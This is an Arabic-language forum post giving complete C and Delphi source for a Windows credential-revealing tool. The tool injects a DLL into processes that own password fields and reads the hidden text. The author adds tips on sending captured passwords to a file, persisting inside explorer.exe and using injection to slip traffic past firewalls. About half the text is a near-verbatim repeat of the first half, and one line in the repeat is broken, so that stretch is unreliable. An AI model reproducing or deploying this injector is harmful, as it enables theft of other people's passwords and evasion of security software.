السلام عليكم
باستخدام الكود الاتي يمكن الحصول على كلمة السر المختفية وراء **** في الانظمة win98,win2k,winxp.
فكرة الكود انه يستخدم تقنية dll injection حيث يقوم بحقن ملفdll في الـ process المستهدف مع اعطاء الامكانية بالتحكم بالـــ process بالقدر المتاح (PROCESS_ALL_ACCESS)
بالنسبة للطريقة المستخدمة لحقن الـ dll فليست هي اقوى الطرق لعمل ذلك فمن الصعوبة باستخدام هذه الطريقة التاكد من انه قد تم فعلا حقن الــــ dll بنجاح .هناك طريقة اقوى لحقن الــ dll لكن الكود بلغة الـ ++C باستخدام vc وان شاء الله اقوم بنشرها لاحقا .
لنبدأ :
//Thanks to my friends njhhack,shellapi,kcahcn
اولا : DLL Project Getpwd.dll
للاسف الكود مكتوب بلغة c ,الكود موجود بلغة delphi لكن هناك مشكلة وهي انه في لغة delphi لا ينفع -بل الاصح القول انني (كاتب الكود njhhack هو ايضا لم يجد حلا للمشكلة ) لم استطع - استخدام الدالة freelibrary ليقوم الـ dll بانهاء نفسه -بعبارة افضل unmapping library module-.
يرجى ممن يجد حلا لهذه المشكلة اخباري وله مني الدعاء و جزيل الشكر.
يمكن استخدام vc or c++builder or lcc-win للقيام بــ compile لهذا الــــ project.عني فقد استخدمت lcc-win حيث ان حجم ملف الــ dll المتكون اصغر مقارنة بغيرها ويمكن الحصول عليه من
http://www.cs.virginia.edu/~lcc-win32/
to download : ftp://ftp.cs.virginia.edu/pub/lcc-win32/lccwin32.exe
وهذا هو الكود :
//-------save it with name getpwd ---------------
#include
BOOL WINAPI __declspec(dllexport)DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved)
{
POINT hPoint;
HWND hParent;
char str[256];
switch (fwdreason)
{
case DLL_PROCESS_ATTACH :
GetCursorPos(&hPoint);
hParent=WindowFromPoint(hPoint);
GetWindowText(hParent,str,256);
MessageBox(0,str,"",0);//you can send pwd to file or ...
FreeLibrary(hinstDLL);//unmapping library module
break;
case DLL_PROCESS_DETACH :
break;
case DLL_THREAD_ATTACH :
break;
case DLL_THREAD_DETACH :
break;
}
return TRUE;
}و ها هو الكود المقابل في لغة الدلفي :
library getpwd;
uses
windows,SysUtils;
function GetModuleHandleFromInstance : THandle;
var
s : array[0..512] of char;
begin
{ Find the DLL filename from the instance value. }
GetModuleFileName(hInstance, s, sizeof(s)-1);
{ Find the handle from the filename. }
Result : = GetModuleHandle(s);
end;
var
tid : dword;
hpoint : tpoint;
hparent : hwnd;
str : array[0..256] of char;
hlong : dword;
procedure getpassword;
begin
GetCursorPos(hPoint);
hParent : =WindowFromPoint(hPoint);
hLong : =GetWindowLong(hParent,GWL_STYLE);
GetWindowText(hParent,str,256);
if ((hLong and ES_PASSWORD)=ES_PASSWORD) then
messagebox(0,str,'Password : ',MB_OK);
//There is a problem here . Hope I can find the solve for it
FreeLibrary(GetModuleHandleFromInstance);
end;
procedure DLLMain(AttachFlag : DWORD);
begin
case AttachFlag of
DLL_PROCESS_ATTACH : CreateThread(nil,0,@getpassword,nil,0,tid);
end;
end;
begin
DLLProc : = @DLLMain;
dllmain(DLL_PROCESS_ATTACH);
end.
ثانيا : Main project
هنا ساذكر طريقتين احدهما باستخدام vcl,والاخرى باستخدام console project (حجم الــ exe المتكون يكون اصغر بكثير ), ولك الخيار في استخدام احدهما .
قبل ذلك فم بتكوين unit جديد ولتسمها injectdll أن شئت . باستخدام injectdll unit يمكنك حقن الــ dll الخاص بك في process اخرى
How about to try it with explorer.exe (your dll will not be closed unless you close explorer) ,firewall (inside the dll try to connect to the internet or send E-mail or … notice what the firewall will tell you ,..etc. :D cool !!
unit injectdll;
interface
uses windows,messages,sysutils;
var
hInst,Handle : thandle;
implementation
procedure injectmydll(hParent : hwnd); //hParent : the handle of the exe you want to inject dll into
var
hRemoteThread,hkernel32,dwRemoteProcessId,hRemoteProcess : integer;
cb,pcb : dword;
pfnStartAddr,pszLibFileName,pszLibFileRemote : pchar;
begin
cb : =256;
//الحصول على PID للبرنامج المستهدف
// Get processID of the target program
GetWindowThreadProcessId(hParent,@dwRemoteProcessId);
//الحصول على handle الـــ process المستهدف
//Get target process handle
hRemoteProcess : =OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
//حساب الذاكرة المطلوبة لـــ DLL path name
//calculate required memory for DLL pathname
getmem(pszLibFileName,cb);
strcopy(pszLibFileName,pchar(ExtractFilePath(ParamStr(0))+'getpwd.dll'));
//Assign DLL file name buffer in the remote process memory address space
//more abou tvirtualallocex go http: //msdn.microsoft.com/library/default.asp?url=/library/en-us/memory/memman_8ptk.asp
pszLibFileRemote : =VirtualAllocEx(hRemoteProcess,NIL,cb,MEM_COMMIT,PAGE_READWRITE);
// copy DLL path name to the remote process memory
WriteProcessMemory(hRemoteProcess,pszLibFileRemote,pszLibFileName,cb,pcb);
Freemem(pszLibFileName);
//الحصول على عنوان الداالة LoadLibraryA في Kernel32.dll
//Get the address of LoadLibraryA function in kernel32.dll
hkernel32 : =GetModuleHandle('Kernel32.dll');
pfnStartAddr : =GetProcAddress(hkernel32,'LoadLibraryA');
//
//run the remote process thead ,
hRemoteThread : =CreateRemoteThread(hRemoteProcess,NIL,0,pfnStartAddr,pszLibFileRemote,0,pcb);
//waiting for the end of the thread
WaitForSingleObject(hRemoteThread,INFINITE);
TerminateThread(hRemoteThread,0);
end;
end.
VCL Project :
//Add TTimer to a form .Its Interval 200 (well. write as you want but ...) …. //Global varilble definiton hInst,Handle,hParent : THandle; hLong : longint; hPoint : TPOINT; implementation uses injectdll; ... // in the event onTimer add this code GetCursorPos(hPoint);GetCursorPos(hPoint); hParent : =WindowFromPoint(hPoint); hLong : =GetWindowLong(hParent,GWL_STYLE); if (hLong and ES_PASSWORD)=ES_PASSWORD then injectmydll(hParent);
Console Project :
//الملف التنفيذي الناتج اصغر بكثير من ذلك الناتج باستخدام vcl
//لانشاءه File / New /other , then choose console project
//قم بحذف الجملة الخاصة بالـ console , هذه الجملة {$APPTYPE CONSOLE}
Program Pass2K;
uses
windows,
messages,
sysutils,injectdll;
var
wClass : TWndClass;
Msg : TMSG;
hInst,Handle,hParent : thandle;
hLong : longint;
hPoint : TPOINT;
function WindowProc(hWnd,Msg,wParam,lParam : integer) : Longint; stdcall;
begin
Result : =DefWindowProc(hWnd,Msg,wParam,lParam);
case Msg of
WM_DESTROY : halt;
WM_TIMER :
begin
GetCursorPos(hPoint);
hParent : =WindowFromPoint(hPoint);
hLong : =GetWindowLong(hParent,GWL_STYLE);
if (hLong and ES_PASSWORD)=ES_PASSWORD then
injectmydll(hParent);
end;
end;
end;
//--
begin
hInst : =GetModuleHandle(nil);
with wClass do
begin
Style : = CS_PARENTDC;
hIcon : = LoadIcon(hInst,'MAINICON');
lpfnWndProc : = @WindowProc;
hInstance : = hInst;
hbrBackground : = COLOR_BTNFACE+1;
lpszClassName : = 'MainHostClass';
hCursor : = LoadCursor(0,IDC_ARROW);
end;
RegisterClass(wClass); handle : =CreateWindow(wClass.lpszClassName,'Get***password',WS_OVERLAPPEDWINDOW or WS_VISIBLE,80,10,220,85,0,0,hInst,nil);
settimer(handle,0,200,NIL);
while(GetMessage(Msg,Handle,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.to download : ftp://ftp.cs.virginia.edu/pub/lcc-win32/lccwin32.exe
وهذا هو الكود :
//-------save it with name getpwd ---------------
#include
BOOL WINAPI __declspec(dllexport)DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved)
{
POINT hPoint;
HWND hParent;
char str[256];
switch (fwdreason)
{
case DLL_PROCESS_ATTACH :
GetCursorPos(&hPoint);
hParent=WindowFromPoint(hPoint);
GetWindowText(hParent,str,256);
MessageBox(0,str,"",0);//you can send pwd to file or ...
FreeLibrary(hinstDLL);//unmapping library module
break;
case DLL_PROCESS_DETACH :
break;
case DLL_THREAD_ATTACH :
break;
case DLL_THREAD_DETACH :
break;
}
return TRUE;
}و ها هو الكود المقابل في لغة الدلفي :
library getpwd;
uses
windows,SysUtils;
function GetModuleHandleFromInstance : THandle;
var
s : array[0..512] of char;
begin
{ Find the DLL filename from the instance value. }
GetModuleFileName(hInstance, s, sizeof(s)-1);
{ Find the handle from the filename. }
Result : = GetModuleHandle(s);
end;
var
tid : dword;
hpoint : tpoint;
hparent : hwnd;
str : array[0..256] of char;
hlong : dword;
procedure getpassword;
begin
GetCursorPos(hPoint);
hParent : =WindowFromPoint(hPoint);
hLong : =GetWindowLong(hParent,GWL_STYLE);
GetWindowText(hParent,str,256);
if ((hLong and ES_PASSWORD)=ES_PASSWORD) then
messagebox(0,str,'Password : ',MB_OK);
//There is a problem here . Hope I can find the solve for it
FreeLibrary(GetModuleHandleFromInstance);
end;
procedure DLLMain(AttachFlag : DWORD);
begin
case AttachFlag of
DLL_PROCESS_ATTACH : CreateThread(nil,0,@getpassword,nil,0,tid);
end;
end;
begin
DLLProc : = @DLLMain;
dllmain(DLL_PROCESS_ATTACH);
end.
ثانيا : Main project
هنا ساذكر طريقتين احدهما باستخدام vcl,والاخرى باستخدام console project (حجم الــ exe المتكون يكون اصغر بكثير ), ولك الخيار في استخدام احدهما .
قبل ذلك فم بتكوين unit جديد ولتسمها injectdll . باستخدام injectdll unit يمكنك حقن الــ dll الخاص بك في process اخرى
How about to try it with explorer.exe (your dll will not be closed unless you close explorer) ,firewall (inside the dll try to connect to the internet or send E-mail or … notice what the firewall will tell you ,..etc. :D cool
unit injectdll;
interface
uses windows,messages,sysutils;
var
hInst,Handle : thandle;
implementation
procedure injectmydll(hParent : hwnd); //hParent : the handle of the exe you want to inject dll into
var
hRemoteThread,hkernel32,dwRemoteProcessId,hRemoteProcess : integer;
cb,pcb : dword;
pfnStartAddr,pszLibFileName,pszLibFileRemote : pchar;
begin
cb : =256;
//الحصول على PID للبرنامج المستهدف
// Get processID of the target program
GetWindowThreadProcessId(hParent,@dwRemoteProcessId);
//الحصول على handle الـــ process المستهدف
//Get target process handle
hRemoteProcess : =OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
//حساب الذاكرة المطلوبة لـــ DLL path name
//calculate required memory for DLL pathname
getmem(pszLibFileName,cb);
strcopy(pszLibFileName,pchar(ExtractFilePath(ParamStr(0))+'getpwd.dll'));
//Assign DLL file name buffer in the remote process memory address space
//more abou tvirtualallocex go http: //msdn.microsoft.com/library/default.asp?url=/library/en-us/memory/memman_8ptk.asp
pszLibFileRemote : =VirtualAllocEx(hRemoteProcess,NIL,cb,MEM_COMMIT,PAGE_READWRITE);
// copy DLL path name to the remote process memory
WriteProcessMemory(hRemoteProcess,pszLibFileRemote,pszLibFileName,cb,pcb);
Freemem(pszLibFileName);
//الحصول على عنوان الداالة LoadLibraryA في Kernel32.dll
//Get the address of LoadLibraryA function in kernel32.dll
hkernel32 : =GetModuleHandle('Kernel32.dll');
pfnStartAddr : =GetProcAddress(hkernel32,'LoadLibraryA');
//
//run the remote process thead ,
hRemoteThread : =CreateRemoteThread(hRemoteProcess,NIL,0,pfnStartAddr,pszLibFileRemote,0,pcb);
//waiting for the end of the thread
WaitForSingleObject(hRemoteThread,INFINITE);
TerminateThread(hRemoteThread,0);
end;
end.
VCL Project :
//Add TTimer to a form .Its Interval 200 (well. write as you want but ...) …. //Global varilble definiton hInst,Handle,hParent : THandle; hLong : longint; hPoint : TPOINT; implementation uses injectdll; ... // in the event onTimer add this code GetCursorPos(hPoint);GetCursorPos(hPoint); hParent : =WindowFromPoint(hPoint); hLong : =GetWindowLong(hParent,GWL_STYLE); if (hLong and ES_PASSWORD)=ES_PASSWORD then injectmydll(hParent);
Console Project :
//الملف التنفيذي الناتج اصغر بكثير من ذلك الناتج باستخدام vcl
//لانشاءه File / New /other , then choose console project
//قم بحذف الجملة الخاصة بالـ console , هذه الجملة {$APPTYPE CONSOLE}
Program Pass2K;
uses
windows,
messages,
sysutils,injectdll;
var
wClass : TWndClass;
Msg : TMSG;
hInst,Handle,hParent : thandle;
hLong : longint;
hPoint : TPOINT;
function WindowProc(hWnd,Msg,wParam,lParam : integer) : Longint; stdcall;
begin
Result : =DefWindowProc(hWnd,Msg,wParam,lParam);
case Msg of
WM_DESTROY : halt;
WM_TIMER :
begin
GetCursorPos(hPoint);
hParent : =WindowFromPoint(hPoint);
hLong : =GetWindowLong(hParent,GWL_STYLE);
if (hLong and ES_PASSWORD)=ES_PASSWORD then
injectmydll(hParent);
end;
end;
end;
//--
begin
hInst : =GetModuleHandle(nil);
with wClass do
begin
Style : = CS_PARENTDC;
hIcon : = LoadIcon(hInst,'MAINICON');
lpfnWndProc : = @WindowProc;
hInstance : = hInst;
hbrBackground : = COLOR_BTNFACE+1;
lpszClassName : = 'MainHostClass';
hCursor : = LoadCursor(0,IDC_ARROW);
end;
RegisterClass(wClass); : =CreateWindow(wClass.lpszClassName,'Get***password',WS_OVERLAPPEDWINDOW or WS_VISIBLE,80,10,220,85,0,0,hInst,nil);
settimer(handle,0,200,NIL);
while(GetMessage(Msg,Handle,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.